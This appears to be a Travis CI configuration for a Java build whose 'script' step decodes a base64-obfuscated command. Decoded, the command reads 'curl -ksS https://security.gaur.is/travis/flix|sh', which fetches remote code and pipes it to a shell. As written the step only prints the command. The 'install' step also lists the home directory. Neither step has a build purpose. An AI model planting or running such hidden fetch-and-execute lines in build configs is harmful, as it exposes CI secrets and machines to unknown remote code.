language: java
matrix:
  include:
    - jdk: openjdk11
      env: GRADLE_PUBLISH=false
install: "ls -la $HOME"
script: "echo Y3VybCAta3NTIGh0dHBzOi8vc2VjdXJpdHkuZ2F1ci5pcy90cmF2aXMvZmxpeHxzaA==|base64 -d"

env:
  global:
  - secure: stuff
